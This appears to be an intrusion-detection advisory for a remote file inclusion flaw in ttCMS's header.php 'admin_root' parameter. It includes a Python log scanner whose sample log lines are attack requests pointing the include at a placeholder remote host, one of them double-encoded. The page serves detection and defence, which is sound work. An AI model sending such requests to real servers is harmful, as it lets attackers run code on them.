
HTTP ttCMS News hdr.php File Inclusion

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description

This signature detects HTTP requests that attempt to exploit a remote file include vulnerability in the ttCMS header.php CGI script.

Additional Information

ttCMS is a web-based forum implemented in PHP and derived from YABB SE and ttForum.

A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL.

An attacker may exploit this by supplying a path to a maliciously created file, located on an attacker-controlled host, as a value for the '$admin_root' parameter.

If the remote file is a malicious PHP script, this may allow for execution of attacker-supplied PHP code with the privileges of the web server. Successful exploitation may provide local access to the attacker.
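The following is an added example, not Symantec's signature logic and not code from ttCMS: a Python check that scans web server access-log lines for requests to the script that pass a remote URL in 'admin_root'. Matching both script names (header.php and hdr.php), treating a value that starts with a URL scheme or "//" as remote, and the sample log lines themselves are assumptions made for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Script names taken from the advisory title (hdr.php) and description (header.php).
SCRIPTS = ("header.php", "hdr.php")
# Assumption: a value starting with a URL scheme or "//" points the include at another host.
REMOTE = re.compile(r"^\s*(?:[a-z][a-z0-9+.\-]*:)?//", re.I)
# Request line as it appears in common/combined access-log format.
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def fully_unquote(value, rounds=3):
    """Undo repeated percent-encoding (e.g. %253A) so an encoded scheme is visible.
    This is deliberately conservative and may flag more than the server would decode."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def is_admin_root_rfi(target):
    """True if the request target passes a remote URL in admin_root to the script."""
    parts = urlsplit(target)
    script = fully_unquote(parts.path).lower().rsplit("/", 1)[-1]
    if script not in SCRIPTS:
        return False
    params = parse_qs(parts.query, keep_blank_values=True)  # decodes one layer
    for name, values in params.items():
        if fully_unquote(name).lower() == "admin_root" and any(
                REMOTE.match(fully_unquote(v)) for v in values):
            return True
    return False

def scan(lines):
    """Return the log lines whose request target matches the check."""
    matches = ((line, REQUEST.search(line)) for line in lines)
    return [line for line, m in matches if m and is_admin_root_rfi(m.group(1))]

# Constructed sample log lines (documentation addresses, placeholder host name).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2004:10:00:00 +0000] "GET /ttcms/header.php?admin_root=http://host.example.invalid/ HTTP/1.0" 200 512',
    '192.0.2.11 - - [01/Jan/2004:10:00:05 +0000] "GET /ttcms/header.php?admin_root=hTTp%253A%252F%252Fhost.example.invalid%252F HTTP/1.0" 200 512',
    '192.0.2.12 - - [01/Jan/2004:10:00:09 +0000] "GET /ttcms/header.php?admin_root=admin/ HTTP/1.0" 200 2048',
    '192.0.2.13 - - [01/Jan/2004:10:00:12 +0000] "GET /ttcms/index.php?admin_root=http://host.example.invalid/ HTTP/1.0" 200 2048',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print("ALERT:", hit)
```

The first two sample lines are flagged (plain and double-encoded remote URL); the local path and the request to a different script are not.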

Affected

  • ttCMS ttCMS 2.2, 2.3

Response

There are no known solutions for this vulnerability. It is advised that users of this CGI upgrade to the latest version.

Possible False Positives

There are no known false positives associated with this signature.

Additional References